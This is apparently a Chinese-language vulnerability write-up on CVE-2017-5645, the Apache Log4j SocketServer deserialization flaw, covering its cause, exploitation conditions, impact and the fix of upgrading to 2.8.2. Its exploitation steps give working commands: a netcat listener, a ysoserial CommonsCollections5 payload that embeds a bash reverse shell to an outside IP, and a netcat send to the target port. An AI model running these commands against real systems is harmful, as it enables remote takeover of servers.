当前位置: 首页 > news >正文

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

CVSS评分:9.8(严重)

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

  • 1. 漏洞原理
  • 2. 漏洞危害
  • 3. 漏洞修复

1. 漏洞原理

Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。Apache Log4j 2.8.2之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用链:

攻击者 ↓ TCP / UDP 发送恶意序列化对象 ↓ Log4j SocketServer ↓ ObjectInputStream.readObject() ↓ Gadget chain ↓ 任意代码执行

攻击者需要满足条件:

  • 目标服务器开启并监听 Log4j Socket Server(TCP 或 UDP)端口
  • 可以向服务器发送任意数据包

具体利用路径概括如下:

  1. 攻击者构造特制的 Java 序列化对象字节流,包含恶意链
  2. 通过网络向 Log4j 的 socket 端口发送该 payload
  3. Log4j 接收到数据后反序列化该对象
  4. 恶意对象触发执行攻击者指定的系统命令

step:

1、nc 监听本地

https://www.revshells.com/

nc-lvnp9001

2、生成恶意payload

java -jar ysoserial.jar CommonsCollections5"sh -i >& /dev/tcp/172.30.22.210/9001 0>&1">payload.bin

3、发送,反弹shell

nc172.xxx.xxx.xxx5007<payload.bin

2. 漏洞危害

微步标记为高风险,重点两高一弱漏洞:

该漏洞可导致直接RCE,尽快修复

3. 漏洞修复

  • 升级到Apache Log4j 2.8.2 或以上版本
http://www.jsqmd.com/news/337012/

相关文章:

  • 小巧电纸书的烦恼与潜力:硬件挑战与社区破解
  • 2026年口碑好的磁悬浮冷水机/冷水机厂家推荐及选择指南 - 品牌宣传支持者
  • Itinerary和segment对比
  • 靶向蛋白组学研究直肠癌生物靶标
  • 开源多智能体框架全景技术调研报告 - 教程
  • 多城市运营场景下,开源跑腿系统源码如何做分站管理
  • 2026年热门的包装袋/货运大型包装袋厂家推荐及选购指南 - 品牌宣传支持者
  • 2026年热门的江苏铝型材深加工/直角支架铝型材深加工厂家推荐及选择参考 - 品牌宣传支持者
  • 福州最好的硕士留学中介,零差评服务全方位解析 - 留学机构评审官
  • 盘点靠谱的中控证培训学校,吉林居安不过包退费通过率高 - 工业设备
  • 软件工程毕业设计最新选题答疑
  • SpaceX星际先行者的三重跃迁:从基本盘到太空生态的万亿蓝图
  • 合肥硕士留学中介口碑排名揭晓,诚信服务引领选择 - 留学机构评审官
  • Unicode、UTF-8、UTF-16
  • 机器人减速器专题报告:下游需求爆发,国产替代加速突围
  • 济南最好的研究生留学机构,诚信服务、专业指导助您成功 - 留学机构评审官
  • 2026年钢结构施工生产厂售后好的公司排名,郑州优质推荐 - 工业品牌热点
  • AI驱动第五科研范式全景指南: 大模型+智能体重塑科技创新,科研效率提升
  • 记录拐点
  • 郑州研究生留学中介,排名靠前,好评多!您的理想选择 - 留学机构评审官
  • 攻防世界-Russian-zips
  • 2026年评价高的家庭过山车游乐设施/太空梭游乐设施厂家推荐及选择参考 - 品牌宣传支持者
  • 2025年AI工具定价指南:主流平台技术特性与成本效益分析
  • 2026年质量好的长吊引水真空机组/水环真空机组厂家推荐及选购指南 - 品牌宣传支持者
  • 看完就会:8个AI论文软件测评!本科生写论文+开题报告全攻略
  • 刚刚,谷歌版「世界模型」震撼公测!网友实测炸翻天:游戏末日来了?
  • 强烈安利10个降AIGC网站,千笔·降AIGC助手帮你轻松降AI率
  • 2026年北京留学中介十强,诚信服务全面解析 - 留学机构评审官
  • 2026年黑龙江实力强的面点培训学校推荐,值得选择吗? - 工业品牌热点
  • 2026年成人纸尿裤堆垛机有行业认证的厂家推荐,费用怎么算 - 工业品网